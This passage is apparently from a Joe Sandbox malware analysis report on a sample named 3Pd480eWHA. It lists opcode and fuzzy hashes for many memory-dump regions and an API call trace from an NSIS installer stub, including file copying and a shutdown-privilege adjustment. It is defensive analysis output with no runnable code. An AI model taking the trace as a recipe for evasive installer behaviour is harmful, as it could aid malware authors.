                                                                                              • Instruction Fuzzy Hash: 5721F575604204AFDB24DF60D9C4F16BBA1FB85314F24C66EE94A4F642C736D847CA62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 88f9d2d467fa29d0b5d759f2a0e938335132ee6118f8bc541e35671f7934a775
                                                                                              • Instruction ID: 85114b991ab59e9b8d0eac00d70b38d35937959f9c70b461e5f071589361afbd
                                                                                              • Opcode Fuzzy Hash: 88f9d2d467fa29d0b5d759f2a0e938335132ee6118f8bc541e35671f7934a775
                                                                                              • Instruction Fuzzy Hash: E4219030600300DBEF395774D9983AD7B61E792326F44087AE606DFAA1DB289CC9C792
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 40eb1656106ed2578f570884f3992e212af7b5090d51bf0410d6d0e4073498ec
                                                                                              • Instruction ID: 2f68fb0cb605548f5c884c5619577256e5f74c47ffa6092dcb904066c2111b15
                                                                                              • Opcode Fuzzy Hash: 40eb1656106ed2578f570884f3992e212af7b5090d51bf0410d6d0e4073498ec
                                                                                              • Instruction Fuzzy Hash: 9C214F30B04249DFDB18DB74C5647EDB7B2AF49305F240479D615EB2A1DB368D81CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8f1e94cbddfe1a964247a978c02226e3c3b31d713c90f414a2bcdeebd4249543
                                                                                              • Instruction ID: a71676c07e9ae21620cc0779ed13e72759c9ffa4d12b6994bc355cecd39f0f77
                                                                                              • Opcode Fuzzy Hash: 8f1e94cbddfe1a964247a978c02226e3c3b31d713c90f414a2bcdeebd4249543
                                                                                              • Instruction Fuzzy Hash: 73212F30B042099FDB18DB74C5647EEB7F6AF49345F240478D605EB250DB369D81CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1639a3a28522e561771f2cd7bddba5f78948eb83fba32ec45e3b0fece91e1880
                                                                                              • Instruction ID: 928b52ff41c460f621b25b61cf88873bdf25a5fadb2ec171652664d7357e6f10
                                                                                              • Opcode Fuzzy Hash: 1639a3a28522e561771f2cd7bddba5f78948eb83fba32ec45e3b0fece91e1880
                                                                                              • Instruction Fuzzy Hash: 4121A1346002009FEF24DB38D884B9A7756EB85325F504A34D20ADF399DB25ECC6CBD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0827eb449caf4208be6b1b89b2bc9c58a968555be0ee5a61738d29e83f81235a
                                                                                              • Instruction ID: 0c87c9e2df28421f06d3fdc1b3d1355340a1433e472e646234327e3ef2d28f30
                                                                                              • Opcode Fuzzy Hash: 0827eb449caf4208be6b1b89b2bc9c58a968555be0ee5a61738d29e83f81235a
                                                                                              • Instruction Fuzzy Hash: FA219D75B001189FEB04DA6DE950B8EBBB7EB88354F148429E905EB341DA32ED018B82
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 10da4136c187542ce2665fa6dc08238e8de7d588078d64d147c24ea3c6e577b4
                                                                                              • Instruction ID: 99a1e7fd1c975e64e502017da2812544f37fdd3e54c63968962d8c850e2c199b
                                                                                              • Opcode Fuzzy Hash: 10da4136c187542ce2665fa6dc08238e8de7d588078d64d147c24ea3c6e577b4
                                                                                              • Instruction Fuzzy Hash: 6321E934710604CFDB58EBB8C958AAE77F2AF8D704F200568E506EB3A0DB759D41CB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 405327e6fbaa0540fee60edfd697afeb2c195adcc1bc857f86b24dd7e4bafe1e
                                                                                              • Instruction ID: 175017d3449378d145c587dd90060cdda6f3f12bcfc109fcbe2e58730977b91b
                                                                                              • Opcode Fuzzy Hash: 405327e6fbaa0540fee60edfd697afeb2c195adcc1bc857f86b24dd7e4bafe1e
                                                                                              • Instruction Fuzzy Hash: 23115E36B002288BDB549A79CC5469E7BEAABCC350B148539D909E7344EE39DD0287D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d154bedd9c95a31c8feb5d690038f3d83613432f12cf1c2f18a310bd0a7c090e
                                                                                              • Instruction ID: 2727f4455402dc5b5e053e33a447108afa3cf54389bff9522a479f7fe6573b30
                                                                                              • Opcode Fuzzy Hash: d154bedd9c95a31c8feb5d690038f3d83613432f12cf1c2f18a310bd0a7c090e
                                                                                              • Instruction Fuzzy Hash: F1118231E042169FCB2AEFB888552DEBBF1AF88310B14047AD405E7301E735C982CB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5ceb1c75e8bd3184ef270fc363344ef8b882f16db03710cc817f04b49d07651f
                                                                                              • Instruction ID: aa064fd18a565e2bafe9c314c0235e90bfcb047d4d626a80d79813e7a99a75f3
                                                                                              • Opcode Fuzzy Hash: 5ceb1c75e8bd3184ef270fc363344ef8b882f16db03710cc817f04b49d07651f
                                                                                              • Instruction Fuzzy Hash: 3411C279B00311DFCB15ABB99C4869E7FE5BB48351B104429EA15EB394EB34C941CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8f506aeae2336ccffe14744c7834b51ad21ab1e59065bb1da6813885d308988e
                                                                                              • Instruction ID: 460af29ac92828ca55f9ee808a28ea54ed13218da62b895785afddd955423b1d
                                                                                              • Opcode Fuzzy Hash: 8f506aeae2336ccffe14744c7834b51ad21ab1e59065bb1da6813885d308988e
                                                                                              • Instruction Fuzzy Hash: 5501F139B042508FE70192AE9815B0EBBEADBCA364F14847AE10ACB356DD52DC0383D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2493791494.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_9d000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 193d0a6e4c6a41fa8d380d8a3aebfad6d5fdfd2e37f37faa7afe8a0cd07d9e29
                                                                                              • Instruction ID: 356958a0bd7aacf42079fdc242202aabf067526da1a749e7cdfe742a9bffd562
                                                                                              • Opcode Fuzzy Hash: 193d0a6e4c6a41fa8d380d8a3aebfad6d5fdfd2e37f37faa7afe8a0cd07d9e29
                                                                                              • Instruction Fuzzy Hash: AA112676544640CFCF05CF10D5C0B16BFB1FB94324F24C2AAD8090B216C33AD856DBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8a4b61f175bf6944adeb29f41256cc0675fc6ae8c8bd238374a6b5ddc661c80a
                                                                                              • Instruction ID: 75a9b0debf9fda0dc5851fb7dd439cbf50d3440920a0e000c0a42ced638b7494
                                                                                              • Opcode Fuzzy Hash: 8a4b61f175bf6944adeb29f41256cc0675fc6ae8c8bd238374a6b5ddc661c80a
                                                                                              • Instruction Fuzzy Hash: B821F2B5D00219EFCB10CF9AD880ACEFBB4FB48314F50822AE918A7240C775A950CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 981ba94599146872b45df120231955bbade4b0eb2a8754c1d405e051945b609b
                                                                                              • Instruction ID: 005f1269198d1bd5ef56cef362b7ac001fcc7b4624915ad49cb94b69415b4cfb
                                                                                              • Opcode Fuzzy Hash: 981ba94599146872b45df120231955bbade4b0eb2a8754c1d405e051945b609b
                                                                                              • Instruction Fuzzy Hash: 8201D474B005508FE712D63C9975B1E7BF6EB8A350F20846AE20ADB392DA25DC028782
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494013072.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_ad000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7f3e037e22fa59686557c36097c7f2c442b72f34ba89836c3c3f47136ec8bdf6
                                                                                              • Instruction ID: 52245dd6818e85e8d125af9fb4ee5b5d69a28ba9b4dd305bed4433bd24c8becf
                                                                                              • Opcode Fuzzy Hash: 7f3e037e22fa59686557c36097c7f2c442b72f34ba89836c3c3f47136ec8bdf6
                                                                                              • Instruction Fuzzy Hash: FB11D075504244DFCB15CF50C5C4B15BBA2FB45314F24C6AED84A4B652C33AD84ACF52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8b4e3c708cb61c2af8ae8458d380afe06266f680380d9c65bec3c3dbf621bb02
                                                                                              • Instruction ID: 154d186ddeef1f62de1a6ee4f3f951dfbf349602560e0ab4e9fe427cef2e7641
                                                                                              • Opcode Fuzzy Hash: 8b4e3c708cb61c2af8ae8458d380afe06266f680380d9c65bec3c3dbf621bb02
                                                                                              • Instruction Fuzzy Hash: 79012131E002169BCB69EFB984512DDB7F5EB89350B15047AD505E7301E735C8C28B95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8b959b4b3b0071ce9a8476de4aa23cfd0e0ceba3fda6c5452d3bdf601d5bcea0
                                                                                              • Instruction ID: 589492b643ae426a99712ddd4ee6eac7c266fed1930d6ed5156459bafc9d718c
                                                                                              • Opcode Fuzzy Hash: 8b959b4b3b0071ce9a8476de4aa23cfd0e0ceba3fda6c5452d3bdf601d5bcea0
                                                                                              • Instruction Fuzzy Hash: 511103B5D00219AFCB10CF9AD880ACEFBB4FB48310F50812AE918A3340C3746940CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7ea9dd52da8adf4802f4cd76e3a41a346d51b09ff4716b700bfb89254a5f9b1b
                                                                                              • Instruction ID: 21561eaa6db078ce784d210b01fd6a8ad58df64d10fd2b062b1c3c177b77268e
                                                                                              • Opcode Fuzzy Hash: 7ea9dd52da8adf4802f4cd76e3a41a346d51b09ff4716b700bfb89254a5f9b1b
                                                                                              • Instruction Fuzzy Hash: F8018139B001108BEB1496AED415B1FA6EADBC9764F10893AF10BC7344DD62ED0347D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7cbac6cdede42ba23b4f574b30f9879f36a48c60d41c9fae344c7f73f0ee92a4
                                                                                              • Instruction ID: ad4a092ec714cb41c31f0765425dec41ef1f9ec737de29b619d78bd878269854
                                                                                              • Opcode Fuzzy Hash: 7cbac6cdede42ba23b4f574b30f9879f36a48c60d41c9fae344c7f73f0ee92a4
                                                                                              • Instruction Fuzzy Hash: 0A01BC39B001108FEB15DA2CD494B2E67EAAB89294F148879F10ACB385DA22DC024396
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 66eff21f34aa73d9a8102022646200118dbe89bafe6a9498d31f3bca25c08212
                                                                                              • Instruction ID: e8c19343ff2e5dc7612bfac12989315a0119cdff03f6bdb13a9e1376b29844f4
                                                                                              • Opcode Fuzzy Hash: 66eff21f34aa73d9a8102022646200118dbe89bafe6a9498d31f3bca25c08212
                                                                                              • Instruction Fuzzy Hash: 3401BC76B411685BEB558AA98C247EE7BEA9BCC310F04417AD909E7644EE258802C7C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4cc4e993d6c7ec31f758457a28117058096ca54c5279d1453e62f2ca6dc0f22e
                                                                                              • Instruction ID: 752279d52ae9fd1b074292410d55d0e3e418f37d636df9b123bf507a982e429d
                                                                                              • Opcode Fuzzy Hash: 4cc4e993d6c7ec31f758457a28117058096ca54c5279d1453e62f2ca6dc0f22e
                                                                                              • Instruction Fuzzy Hash: BE01813A7001108FEB14996DD454B1F67EADBC97A4F108839F50BCB384DE22EC024396
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: debf13cb887c62f578bf84caab6110569e8a4631c655b9dd720fb9cd36abacfd
                                                                                              • Instruction ID: ca6b613047a5a51a23894ab62f9242df347499b76157d1fc9162339710c8ee32
                                                                                              • Opcode Fuzzy Hash: debf13cb887c62f578bf84caab6110569e8a4631c655b9dd720fb9cd36abacfd
                                                                                              • Instruction Fuzzy Hash: 8601C035A002048BDB14DF94D98478ABBA1EF80311F958665D8086F29ADB71EE46CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a8c36b1dd423b2ced20d43183dbebbbd4bf9615fd532d6e39713148de5ab79b4
                                                                                              • Instruction ID: 6d5f56d9d48ebb477ceefc6f28e1f1f5efac6c8e2a12b8081bc2b0efd06b2dfe
                                                                                              • Opcode Fuzzy Hash: a8c36b1dd423b2ced20d43183dbebbbd4bf9615fd532d6e39713148de5ab79b4
                                                                                              • Instruction Fuzzy Hash: 7401A475B101148FE714D62CD865B1F73EAEB89354F208839F20ADB344EE26EC024781
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5a1b27bc405f4920027bb08960375a5cded931dd84f7c58d2047ae1e53e1cb38
                                                                                              • Instruction ID: 1ed358d735a1b72932ca147db73dcf12824d2bc6c6189291b5359dd8df041f5b
                                                                                              • Opcode Fuzzy Hash: 5a1b27bc405f4920027bb08960375a5cded931dd84f7c58d2047ae1e53e1cb38
                                                                                              • Instruction Fuzzy Hash: E0F02E21B093446FE3262678541076E3FB66FC6155B160077E501DB296DE645C4743A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 415808d33d56122f72ba93c50ada7c13bc832fd655a9939e2aa531c3b296e825
                                                                                              • Instruction ID: a20d8e8b1ff28e7805d3e64dfbe3865216c8d84c0fceaf12f16be6e961bc7ffd
                                                                                              • Opcode Fuzzy Hash: 415808d33d56122f72ba93c50ada7c13bc832fd655a9939e2aa531c3b296e825
                                                                                              • Instruction Fuzzy Hash: 77F05C31B0420097E32826BD581077F76EABFC5392F11443BF101DB240DF60AC0712E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: acd28b681e0ff94730da541c359aafbffb6a99d834bbee9c242f43fa517c3b0a
                                                                                              • Instruction ID: 74572f54d2c69700513b536e69f8612808304fa25770f146e555a47913d9ce7a
                                                                                              • Opcode Fuzzy Hash: acd28b681e0ff94730da541c359aafbffb6a99d834bbee9c242f43fa517c3b0a
                                                                                              • Instruction Fuzzy Hash: 19F0E5BAE00218CBEF2085A9D84478EBBFDE7453B5F10443BE91AE7340D672AC458782
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9c58ed253bff60aa161ca5486cddb76e77fdc654bafa2529748f20d1426b6278
                                                                                              • Instruction ID: bd511159a9c9d6dfe449eefa497f9aa193a3122ea4dfb993cc54490bb2145312
                                                                                              • Opcode Fuzzy Hash: 9c58ed253bff60aa161ca5486cddb76e77fdc654bafa2529748f20d1426b6278
                                                                                              • Instruction Fuzzy Hash: 7CF0B235B40204CFC704DB78D9A8BAC77B2EF88316F5140A8E5069B7A4DB35AD42CB41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3bb53598b9875686219feb048e0c7cc9fabc1c1d816c7acecce4753b14ef5d0d
                                                                                              • Instruction ID: c2254a71250c6f801bf36a4fbdbea6ef29ece106107adfa21be606d42a264e37
                                                                                              • Opcode Fuzzy Hash: 3bb53598b9875686219feb048e0c7cc9fabc1c1d816c7acecce4753b14ef5d0d
                                                                                              • Instruction Fuzzy Hash: EDE08676E18288DBEB01CEB0864939FB7B8DB46208F3589FBD408DB141E137CA02D741
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 82c574fb3a2582f680a98555ed578c5c38aadbef4a76f7d4ebcd08417daa1226
                                                                                              • Instruction ID: 23fc44b9887ca7f807a12ea137ec3a1840bf18c7d7d1f824ee9483fa7aab723a
                                                                                              • Opcode Fuzzy Hash: 82c574fb3a2582f680a98555ed578c5c38aadbef4a76f7d4ebcd08417daa1226
                                                                                              • Instruction Fuzzy Hash: E5D02B229083044FF32D4654751836137D21B04310F0984A7F84DCB581DB144C804380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a525e7d351cc6d846f736f0cfdf65f1139db6334635329c46f7079e25c03271a
                                                                                              • Instruction ID: 98cc20935a8d2ffad7b0cb674fc51b3d1e069b4c8683371ae90908b959394b42
                                                                                              • Opcode Fuzzy Hash: a525e7d351cc6d846f736f0cfdf65f1139db6334635329c46f7079e25c03271a
                                                                                              • Instruction Fuzzy Hash: 74D0A735605714DBE338DB99E104693B7DBBB48724B85842EF48783A80CB60FC418BC0
                                                                                              APIs
                                                                                                • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                                                • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403140
                                                                                              • #17.COMCTL32(00000007,00000009), ref: 00403162
                                                                                              • OleInitialize.OLE32(00000000), ref: 00403169
                                                                                              • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403185
                                                                                              • GetCommandLineA.KERNEL32(007A1740,NSIS Error), ref: 0040319A
                                                                                              • GetModuleHandleA.KERNEL32(00000000,007A8000,00000000), ref: 004031AD
                                                                                              • CharNextA.USER32(00000000,007A8000,00000020), ref: 004031D8
                                                                                              • GetTempPathA.KERNEL32(00000400,007A9400,00000000,00000020), ref: 004032D5
                                                                                              • GetWindowsDirectoryA.KERNEL32(007A9400,000003FB,?,007A8000,00000000,?,?,00000160), ref: 004032E6
                                                                                              • lstrcatA.KERNEL32(007A9400,\Temp,?,007A8000,00000000,?,?,00000160), ref: 004032F2
                                                                                              • GetTempPathA.KERNEL32(000003FC,007A9400,007A9400,\Temp,?,007A8000,00000000,?,?,00000160), ref: 00403306
                                                                                              • lstrcatA.KERNEL32(007A9400,Low,?,007A8000,00000000,?,?,00000160), ref: 0040330E
                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,007A9400,007A9400,Low,?,007A8000,00000000,?,?,00000160), ref: 0040331F
                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,007A9400,?,007A8000,00000000,?,?,00000160), ref: 00403327
                                                                                              • DeleteFileA.KERNEL32(007A9000), ref: 0040333B
                                                                                              • OleUninitialize.OLE32(?,?,007A8000,00000000,?,?,00000160), ref: 004033E9
                                                                                              • ExitProcess.KERNEL32 ref: 0040340A
                                                                                              • lstrcatA.KERNEL32(007A9400,~nsu,007A8000,?,?,?,007A8000,00000000,?,?,00000160), ref: 0040341D
                                                                                              • lstrcatA.KERNEL32(007A9400,0040914C,007A9400,~nsu,007A8000,?,?,?,007A8000,00000000,?,?,00000160), ref: 0040342C
                                                                                              • lstrcatA.KERNEL32(007A9400,.tmp,007A9400,~nsu,007A8000,?,?,?,007A8000,00000000,?,?,00000160), ref: 00403437
                                                                                              • lstrcmpiA.KERNEL32(007A9400,007A8C00), ref: 00403443
                                                                                              • SetCurrentDirectoryA.KERNEL32(007A9400,007A9400,?,?,?,007A8000,00000000,?,?,00000160), ref: 0040345F
                                                                                              • DeleteFileA.KERNEL32(0079D100,0079D100,?,007A3000,?,?,?,?,007A8000,00000000,?,?,00000160), ref: 004034B8
                                                                                              • CopyFileA.KERNEL32(007A9C00,0079D100,00000001), ref: 004034CC
                                                                                              • CloseHandle.KERNEL32(00000000,0079D100,0079D100,?,0079D100,?,?,?,?,007A8000,00000000,?,?,00000160), ref: 004034F9
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,007A8000,00000000,?,?,00000160), ref: 00403527
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,00000160), ref: 0040352E
                                                                                              • LookupPrivilegeValueA.ADVAPI32(?,SeShutdownPrivilege,?), ref: 00403546
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?,?,SeShutdownPrivilege,?,?,?,00000160), ref: 00403565
                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403589
                                                                                              • ExitProcess.KERNEL32 ref: 004035AC
                                                                                                • Part of subcall function 004057A9: CharNextA.USER32(?,004031D7,007A8000,00000020), ref: 004057B6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
